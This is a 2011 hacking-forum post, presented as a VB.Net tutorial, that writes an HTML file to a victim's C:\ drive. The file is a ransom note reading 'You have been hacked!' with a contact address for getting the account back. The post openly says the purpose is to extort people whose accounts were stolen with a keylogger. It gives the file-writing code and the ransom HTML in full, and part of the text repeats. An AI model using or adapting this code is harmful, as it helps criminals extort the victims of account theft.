[VB.Net] Make a HTML about page 01-18-2011, 03:42 PM
#1
Ok the first question is that WHY to even make a about page?
answer: For example you have a custom keylogger which you made your self and don't want to use RAT's. When you hack the victim and want to make money out of it for returning his account well, he wont know how to contact you. you can make a About page in his computer to tell him how to contact you
.
Things you need:
First open your project or start a new one. you can put this in the form's load. so add a:
above Public Class Form1
Then add
Now you need to chose the location that the file is going to be created, So we are going to use a string dim. add this:
( Note that the file can be .htm, .html, .asp and .txt :epic: )
Now in your form add a new Label ( i use labels
) and in the text field add this:
Now below the dim location as string = "C:\About.html" add:
And now you have an About page
Hope this guide helped someone
answer: For example you have a custom keylogger which you made your self and don't want to use RAT's. When you hack the victim and want to make money out of it for returning his account well, he wont know how to contact you. you can make a About page in his computer to tell him how to contact you
.Things you need:
- Visual Studio :epic:
- Some knowledge of HTML ( the basics )
- Some VB knowledge :epic:
- A Brain :epic:
First open your project or start a new one. you can put this in the form's load. so add a:
Code:
Imports system.ioabove Public Class Form1
Then add
Code:
Private sub form1_load handles mybase.loadNow you need to chose the location that the file is going to be created, So we are going to use a string dim. add this:
Code:
Dim location as string = "C:\About.html"( Note that the file can be .htm, .html, .asp and .txt :epic: )
Now in your form add a new Label ( i use labels
) and in the text field add this:Code:
<html>
<title>You have been hacked!</title>
<body><center>
<p><font color="FF0000">Your account has been hacked! for return of it mail: any@any.com</font></center>
</body>
</html>Now below the dim location as string = "C:\About.html" add:
Code:
dim ftr As New FileStream(location, FileMode.Create, FileAccess.Write)
dim stw As New StreamWriter(ftr)
stw.BaseStream.Seek(0, SeekOrigin.End)
stw.Write(Label1.Text)
stw.Close()
End subAnd now you have an About page

Hope this guide helped someone
(This post was last modified: 01-18-2011, 03:43 PM by Skullmeat.)
Pierce the life fibers with your drill.



![[+]](https://sinister.li/images/modern/collapse_collapsed.png)